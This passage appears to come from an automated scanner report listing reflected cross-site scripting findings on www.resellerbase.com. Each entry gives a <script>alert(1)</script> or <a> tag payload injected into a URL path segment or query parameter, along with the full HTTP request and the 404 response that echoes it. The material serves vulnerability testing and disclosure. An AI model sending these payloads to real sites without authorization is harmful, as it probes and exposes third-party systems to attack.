GET /detail44fda<script>alert(1)</script>cf8ba662e94/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail44fda<script>alert(1)</script>cf8ba662e94/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1167. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66de4<script>alert(1)</script>f3558803c31 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1466de4<script>alert(1)</script>f3558803c31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1466de4<script>alert(1)</script>f3558803c31/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1168. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 17fcc<script>alert(1)</script>2be3ee3955b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes17fcc<script>alert(1)</script>2be3ee3955b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes17fcc<script>alert(1)</script>2be3ee3955b/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1169. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fa2cf<script>alert(1)</script>6ea6d2ebfbc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmosfa2cf<script>alert(1)</script>6ea6d2ebfbc/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmosfa2cf<script>alert(1)</script>6ea6d2ebfbc/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1170. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 72b6d<script>alert(1)</script>d929cd695f4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images72b6d<script>alert(1)</script>d929cd695f4/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images72b6d<script>alert(1)</script>d929cd695f4/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1171. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e9983<script>alert(1)</script>385e627a963 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/ratinge9983<script>alert(1)</script>385e627a963/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/ratinge9983<script>alert(1)</script>385e627a963/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1172. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload df1f7<script>alert(1)</script>4b7eab0c351 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/search.phpdf1f7<script>alert(1)</script>4b7eab0c351?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.phpdf1f7<script>alert(1)</script>4b7eab0c351?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1173. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 87fa4<a>03d55b74d7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search87fa4<a>03d55b74d7&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search87fa4<a>03d55b74d7&opt=2 was not found on this server.</p>
...[SNIP]...

2.1174. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload d3d05<a>463d779ec80 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...d3d05<a>463d779ec80&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.php?keyword=search...d3d05<a>463d779ec80&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1175. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e9327<script>alert(1)</script>b5ba210fefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e9327<script>alert(1)</script>b5ba210fefc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&e9327<script>alert(1)</script>b5ba210fefc=1 was not found on this server.</p>
...[SNIP]...

2.1176. http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5d2b6<a>8967e11f027 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25d2b6<a>8967e11f027 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25d2b6<a>8967e11f027 was not found on this server.</p>
...[SNIP]...

2.1177. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload abdde<script>alert(1)</script>e1735245848 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailabdde<script>alert(1)</script>e1735245848/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailabdde<script>alert(1)</script>e1735245848/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1178. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e0d4<script>alert(1)</script>63d23e8b42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/141e0d4<script>alert(1)</script>63d23e8b42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/141e0d4<script>alert(1)</script>63d23e8b42/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1179. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dff22<script>alert(1)</script>b7baf494ee4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themesdff22<script>alert(1)</script>b7baf494ee4/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themesdff22<script>alert(1)</script>b7baf494ee4/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1180. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2b797<script>alert(1)</script>3a53ae4400d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos2b797<script>alert(1)</script>3a53ae4400d/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos2b797<script>alert(1)</script>3a53ae4400d/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1181. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7bcfe<script>alert(1)</script>2b6f7660de4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images7bcfe<script>alert(1)</script>2b6f7660de4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images7bcfe<script>alert(1)</script>2b6f7660de4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1182. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c965a<script>alert(1)</script>638032c76a1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/kosmos/images/search.phpc965a<script>alert(1)</script>638032c76a1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/kosmos/images/search.phpc965a<script>alert(1)</script>638032c76a1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1183. http://www.resellerbase.com/detail/14/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d0db3<a>69ad84d9002 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchd0db3<a>69ad84d9002&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

